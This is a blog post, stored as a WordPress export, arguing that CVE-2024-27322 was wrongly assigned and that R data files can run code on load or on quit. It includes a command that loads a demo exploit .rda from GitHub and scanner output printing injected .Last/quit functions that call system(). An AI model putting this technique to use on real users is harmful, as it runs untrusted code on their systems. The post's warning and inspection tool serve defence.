{"id":19774,"date":"2024-05-03T05:12:52","date_gmt":"2024-05-03T10:12:52","guid":{"rendered":"https:\/\/rud.is\/b\/?p=19774"},"modified":"2024-05-03T05:12:52","modified_gmt":"2024-05-03T10:12:52","slug":"cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0","status":"publish","type":"post","link":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/","title":{"rendered":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0"},"content":{"rendered":"

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT\/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.<\/p>\n

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was\/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.<\/p>\n

Konrad Rudolph<\/a> and Iakov Davydov<\/a> did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused<\/a>. Please take a moment and drop a note on Mastodon to them saying \u201cthank you\u201d. This is excellent work. We need more folks like them in this ecosystem.<\/p>\n

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful<\/em> beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings<\/a>. Amongst other things, they let you access an object to get a value, but \u2014\u00a0in doing so \u2014\u00a0code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.<\/p>\n

When you load()<\/code> an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there<\/em>. So, if it has an object named print<\/code> that\u2019s going to be in your global environment and get called when print()<\/code> gets called. Lather\/rinse\/repeat for any other object name. It should be pretty obvious how this could be abused.<\/p>\n

A tad more insidious is what happens when you quit R. By default, on quit()<\/code>, unless you specify otherwise, that function invocation will also call .Last()<\/code> if it exists in the environment. This functionality exists in the event things need to be cleaned up. One \u201cnice\u201d aspect of .<\/code>-prefixed R objects is that they\u2019re hidden by default from the environment. So, you may not even notice if an R data file you\u2019ve loaded has that defined. (You likely do not check what\u2019s loaded anyway.)<\/p>\n

It\u2019s also possible to create custom R objects that have their own \u201cfinalizers\u201d (ref reg.finalizer<\/code>), which will also get called by default when the objects are being destroyed on quit.<\/p>\n

There are also likely other ways to trigger unwanted behavior.<\/p>\n

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:<\/p>\n

load(url(\"https:\/\/github.com\/hrbrmstr\/rdaradar\/raw\/main\/exploit.rda\"))\n<\/code><\/pre>\n
Then, quit R\/RStudio\/R GUI (this will be less dramatic on linux, but the demo should still be effective).<\/p>\n
If you must<\/em> take in untrusted R data files, keep reading.<\/p>\n
I threw together an R script<\/a> along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.<\/p>\n
If one were to run Rscript check.R<\/code> from that repo with that exploit.rda<\/code> file as a parameter, one would see this:<\/p>\n
-----------------------------------------------\nLoading R data file in quarantined environment\u2026\n-----------------------------------------------\n\nLoading objects:\n  .Last\n  quit\n\n-----------------------------------------\nEnumerating objects in loaded R data file\n-----------------------------------------\n\n.Last : function (...)  \n - attr(*, \"srcref\")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6\n  ..- attr(*, \"srcfile\")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> \nquit : function (...)  \n - attr(*, \"srcref\")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6\n  ..- attr(*, \"srcfile\")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> \n\n------------------------------------\nFunctions found: enumerating sources\n------------------------------------\n\nChecking `.Last`\u2026\n\n!! `.Last` may execute arbitrary code on your system under certain conditions !!\n\n`.Last` source:\n{\n    cmd = if (.Platform$OS.type == \"windows\") \n        \"calc.exe\"\n    else if (grepl(\"^darwin\", version$os)) \n        \"open -a Calculator.app\"\n    else \"echo pwned\\\\!\"\n    system(cmd)\n}\n\n\nChecking `quit`\u2026\n\n!! `quit` may execute arbitrary code on your system under certain conditions !!\n\n`quit` source:\n{\n    cmd = if (.Platform$OS.type == \"windows\") \n        \"calc.exe\"\n    else if (grepl(\"^darwin\", version$os)) \n        \"open -a Calculator.app\"\n    else \"echo pwned\\\\!\"\n    system(cmd)\n}\n<\/code><\/pre>\n
There’s info in the repo on how to use that with Docker.<\/p>\n
FIN<\/h3>\n
The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.<\/p>\n
While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.<\/p>\n","protected":false},"excerpt":{"rendered":"
I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT\/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are. A security vendor decided to try to get some hype before 2024 RSAC and made […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"activitypub_content_warning":"","activitypub_content_visibility":"","activitypub_max_image_attachments":3,"activitypub_interaction_policy_quote":"anyone","activitypub_status":"federated","footnotes":""},"categories":[91],"tags":[],"class_list":["post-19774","post","type-post","status-publish","format-standard","hentry","category-r"],"yoast_head":"\nCVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is\" \/>\n<meta property=\"og:description\" content=\"I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT\/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are. A security vendor decided to try to get some hype before 2024 RSAC and made […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\" \/>\n<meta property=\"og:site_name\" content=\"rud.is\" \/>\n<meta property=\"article:published_time\" content=\"2024-05-03T10:12:52+00:00\" \/>\n<meta name=\"author\" content=\"hrbrmstr\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"hrbrmstr\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\"},\"author\":{\"name\":\"hrbrmstr\",\"@id\":\"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886\"},\"headline\":\"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0\",\"datePublished\":\"2024-05-03T10:12:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\"},\"wordCount\":694,\"commentCount\":6,\"publisher\":{\"@id\":\"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886\"},\"articleSection\":[\"R\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\",\"url\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\",\"name\":\"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is\",\"isPartOf\":{\"@id\":\"https:\/\/rud.is\/b\/#website\"},\"datePublished\":\"2024-05-03T10:12:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/rud.is\/b\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/rud.is\/b\/#website\",\"url\":\"https:\/\/rud.is\/b\/\",\"name\":\"rud.is\",\"description\":\""In God we trust. All others must bring data"\",\"publisher\":{\"@id\":\"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/rud.is\/b\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886\",\"name\":\"hrbrmstr\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1\",\"url\":\"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1\",\"width\":460,\"height\":460,\"caption\":\"hrbrmstr\"},\"logo\":{\"@id\":\"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1\"},\"description\":\"Don't look at me\u2026I do what he does \u2014 just slower. #rstats avuncular \u2022 ?Resistance Fighter \u2022 Cook \u2022 Christian \u2022 [Master] Chef des Donn\u00e9es de S\u00e9curit\u00e9 @ @rapid7\",\"sameAs\":[\"http:\/\/rud.is\"],\"url\":\"https:\/\/rud.is\/b\/author\/hrbrmstr\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is","og_description":"I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT\/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are. A security vendor decided to try to get some hype before 2024 RSAC and made […]","og_url":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/","og_site_name":"rud.is","article_published_time":"2024-05-03T10:12:52+00:00","author":"hrbrmstr","twitter_card":"summary_large_image","twitter_misc":{"Written by":"hrbrmstr"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#article","isPartOf":{"@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/"},"author":{"name":"hrbrmstr","@id":"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886"},"headline":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0","datePublished":"2024-05-03T10:12:52+00:00","mainEntityOfPage":{"@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/"},"wordCount":694,"commentCount":6,"publisher":{"@id":"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886"},"articleSection":["R"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/","url":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/","name":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 - rud.is","isPartOf":{"@id":"https:\/\/rud.is\/b\/#website"},"datePublished":"2024-05-03T10:12:52+00:00","breadcrumb":{"@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/rud.is\/b\/2024\/05\/03\/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/rud.is\/b\/"},{"@type":"ListItem","position":2,"name":"CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0"}]},{"@type":"WebSite","@id":"https:\/\/rud.is\/b\/#website","url":"https:\/\/rud.is\/b\/","name":"rud.is","description":""In God we trust. All others must bring data"","publisher":{"@id":"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/rud.is\/b\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/rud.is\/b\/#\/schema\/person\/d7cb7487ab0527447f7fda5c423ff886","name":"hrbrmstr","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1","url":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1","contentUrl":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1","width":460,"height":460,"caption":"hrbrmstr"},"logo":{"@id":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2023\/10\/ukr-shield.png?fit=460%2C460&ssl=1"},"description":"Don't look at me\u2026I do what he does \u2014 just slower. #rstats avuncular \u2022 ?Resistance Fighter \u2022 Cook \u2022 Christian \u2022 [Master] Chef des Donn\u00e9es de S\u00e9curit\u00e9 @ @rapid7","sameAs":["http:\/\/rud.is"],"url":"https:\/\/rud.is\/b\/author\/hrbrmstr\/"}]}},"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p23idr-58W","jetpack_likes_enabled":true,"jetpack-related-posts":[{"id":4929,"url":"https:\/\/rud.is\/b\/2017\/01\/22\/create-parquet-files-from-r-data-frames-with-sergeant-apache-drill-a-k-a-make-parquet-files-great-again-in-r\/","url_meta":{"origin":19774,"position":0},"title":"Create Parquet Files From R Data Frames With sergeant & Apache Drill (a.k.a. Make Parquet Files Great Again in R)","author":"hrbrmstr","date":"2017-01-22","format":false,"excerpt":"2021-11-04 UPDATE: Just use {arrow}. Apache Drill is a nice tool to have in the toolbox as it provides a SQL front-end to a wide array of database and file back-ends and runs in standalone\/embedded mode on every modern operating system (i.e. you can get started with or play locally\u2026","rel":"","context":"In "Apache Drill"","block_context":{"text":"Apache Drill","link":"https:\/\/rud.is\/b\/category\/apache-drill\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":9496,"url":"https:\/\/rud.is\/b\/2018\/04\/08\/dissecting-r-package-utility-belts\/","url_meta":{"origin":19774,"position":1},"title":"Dissecting R Package “Utility Belts”","author":"hrbrmstr","date":"2018-04-08","format":false,"excerpt":"Many R package authors (including myself) lump a collection of small, useful functions into some type of utils.R file and usually do not export the functions since they are (generally) designed to work on package internals rather than expose their functionality via the exported package API. Just like Batman's utility\u2026","rel":"","context":"In "R"","block_context":{"text":"R","link":"https:\/\/rud.is\/b\/category\/r\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2018\/04\/r-utility-belt-final.png?fit=891%2C375&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2018\/04\/r-utility-belt-final.png?fit=891%2C375&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2018\/04\/r-utility-belt-final.png?fit=891%2C375&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/rud.is\/b\/wp-content\/uploads\/2018\/04\/r-utility-belt-final.png?fit=891%2C375&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":4611,"url":"https:\/\/rud.is\/b\/2016\/08\/06\/quicklookr-a-macos-quicklook-plugin-for-r-data-files\/","url_meta":{"origin":19774,"position":2},"title":"QuickLookR – A macOS QuickLook plugin for R Data files","author":"hrbrmstr","date":"2016-08-06","format":false,"excerpt":"I had tried to convert my data-saving workflows to [`feather`](https:\/\/github.com\/wesm\/feather\/tree\/master\/R) but there have been [issues](https:\/\/github.com\/wesm\/feather\/issues\/155) with it supporting large files (that seem to be near resolution), so I've been continuing to use R Data files for local saving of processed\/cleaned data. I make _many_ of these files and sometimes I\u2026","rel":"","context":"In "Objective-C"","block_context":{"text":"Objective-C","link":"https:\/\/rud.is\/b\/category\/objective-c\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6146,"url":"https:\/\/rud.is\/b\/2017\/08\/01\/r%e2%81%b6-reticulating-parquet-files\/","url_meta":{"origin":19774,"position":3},"title":"R\u2076 \u2014 Reticulating Parquet Files","author":"hrbrmstr","date":"2017-08-01","format":false,"excerpt":"The reticulate package provides a very clean & concise interface bridge between R and Python which makes it handy to work with modules that have yet to be ported to R (going native is always better when you can do it). This post shows how to use reticulate to create\u2026","rel":"","context":"In "data wrangling"","block_context":{"text":"data wrangling","link":"https:\/\/rud.is\/b\/category\/data-wrangling\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6046,"url":"https:\/\/rud.is\/b\/2017\/05\/31\/drilling-into-csvs-teaser-trailer\/","url_meta":{"origin":19774,"position":4},"title":"Drilling Into CSVs \u2014 Teaser Trailer","author":"hrbrmstr","date":"2017-05-31","format":false,"excerpt":"I used reading a directory of CSVs as the foundational example in my recent post on idioms. During my exchange with Matt, Hadley and a few others -- in the crazy Twitter thread that spawned said post -- I mentioned that I'd personally \"just use Drill\u201d. I'll use this post\u2026","rel":"","context":"In "Apache Drill"","block_context":{"text":"Apache Drill","link":"https:\/\/rud.is\/b\/category\/apache-drill\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":12185,"url":"https:\/\/rud.is\/b\/2019\/05\/12\/quick-hit-updates-to-quicklookr-and-rdatainfo\/","url_meta":{"origin":19774,"position":5},"title":"Quick Hit: Updates to QuickLookR and {rdatainfo}","author":"hrbrmstr","date":"2019-05-12","format":false,"excerpt":"I'm using GitUgh links here b\/c the issue was submitted there. Those not wishing to be surveilled by Microsoft can find the macOS QuickLook plugin project and {rdatainfo} project in SourceHut and GitLab (~hrbrmstr and hrbrmstr accounts respectively). I hadn't touched QuickLookR? or {rdatainfo}? at all since 2016 since it\u2026","rel":"","context":"In "macOS"","block_context":{"text":"macOS","link":"https:\/\/rud.is\/b\/category\/macos\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/posts\/19774","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/comments?post=19774"}],"version-history":[{"count":0,"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/posts\/19774\/revisions"}],"wp:attachment":[{"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/media?parent=19774"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/categories?post=19774"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/rud.is\/b\/wp-json\/wp\/v2\/tags?post=19774"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}